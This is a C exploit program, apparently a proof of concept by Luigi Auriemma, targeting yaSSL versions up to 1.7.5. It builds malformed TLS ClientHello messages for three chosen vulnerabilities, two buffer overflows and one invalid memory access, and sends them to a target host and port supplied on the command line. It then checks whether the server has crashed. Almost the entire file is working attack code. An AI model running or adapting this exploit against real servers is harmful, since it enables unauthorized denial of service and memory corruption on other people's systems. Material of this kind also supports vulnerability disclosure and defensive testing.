/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0xffff



int ssl_send(int sd, u8 *buff, int len);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int     attack;
int     SESSIONID   = 0x00,                     // exploits if major than 32
        CIPHSUITE   = 0x0000,                   // exploits if major than 64 * 2
        COMPMETH    = 0x00,
        RANDOM      = 0x0000;                   // exploits if major than 32



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd;
    u8      *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "yaSSL <= 1.7.5 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s <attack> <host> <port>\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow in ProcessOldClientHello\n"
            " 2 = buffer-overflow in \"input_buffer& operator>>\"\n"
            " 3 = invalid memory access in HASHwithTransform::Update\n"
            "\n", argv[0]);
        exit(1);
    }

    attack = atoi(argv[1]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(atoi(argv[3]));
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    p = buff;
    if(attack == 1) {
        printf("- buffer-overflow in ProcessOldClientHello\n");
        RANDOM = 0x0fff;

        p += putxx(p, 0,            16);        // sz (useless)
        p += putxx(p, 1,            8);         // Hello
        p += putxx(p, 0x0301,       16);        // version
        p += putxx(p, CIPHSUITE,    16);        // cipher suites length
        p += putxx(p, SESSIONID,    16);        // session ID length
        p += putxx(p, RANDOM,       16);        // random size
        p += putcc(p, 'A',          CIPHSUITE); // cipher suites
        p += putcc(p, 'A',          SESSIONID); // session ID
        p += putcc(p, 'A',          RANDOM);    // random

    } else if(attack == 2) {
        printf("- buffer-overflow in \"input_buffer& operator>>\"\n");
        CIPHSUITE = 0xdfff;

        p += putxx(p, 1,            8);         // Hello
        p += putxx(p, 0,            24);        // length (will be corrected later)
        p += putxx(p, 0x0301,       16);        // TLS 1.0
        p += putxx(p, time(NULL),   32);        // gmt_unix_time
        p += putcc(p, 0xff,         28);        // random
        p += putxx(p, SESSIONID,    8);         // session ID length
        p += putcc(p, 'A',          SESSIONID); // session ID
        p += putxx(p, CIPHSUITE,    16);        // cipher suites length
        p += putcc(p, 'A',          CIPHSUITE); // cipher suites
        p += putxx(p, COMPMETH,     8);         // compression methods length
        p += putcc(p, 'A',          COMPMETH);  // compression methods

    } else if(attack == 3) {
        printf("- invalid memory access in HASHwithTransform::Update\n");

        p += putxx(p, 1,            8);         // Hello
        p += putxx(p, 0,            24);        // length (will be corrected later)
        p += putxx(p, 0x0301,       16);        // TLS 1.0
        p += putxx(p, time(NULL),   32);        // gmt_unix_time
        p += putcc(p, 0xff,         28);        // random
        p += putxx(p, 0,            8);         // session ID length
        p += putxx(p, 0,            16);        // cipher suites length
        p += putxx(p, 0,            8);         // compression methods length

    } else {
        printf("\nError: wrong attack number %d\n", attack);
        exit(1);
    }

    printf("- send malformed SSL data\n");
    if(ssl_send(sd, buff, p - buff) < 0) goto quit;

    if((timeout(sd, 3) < 0) || (recv(sd, buff, BUFFSZ, 0) <= 0)) {
        printf("- server is probably crashed\n");
    }

    printf("- done\n");
    close(sd);
    free(buff);
    return(0);
quit:
    printf("\nError: something wrong during communication with the server\n");
    close(sd);
    free(buff);
    return(1);
}



int ssl_send(int sd, u8 *buff, int len) {
    u8      head[1 + 2 + 2],
            *p;

    if(attack != 1) {
        p = head;
        p += putxx(p, 22,           8);         // handshake
        p += putxx(p, 0x0301,       16);        // TLS 1.0
        p += putxx(p, len,          16);        // length
        if(send(sd, head, sizeof(head), 0) != sizeof(head)) return(-1);

        putxx(buff + 1, len - 4,    24);
        if(attack == 3) putxx(buff + 1, 0xffffff, 24);
    }

    if(send(sd, buff, len, 0) != len) return(-1);
    return(0);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << ((bytes - 1 - i) << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
    }

    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


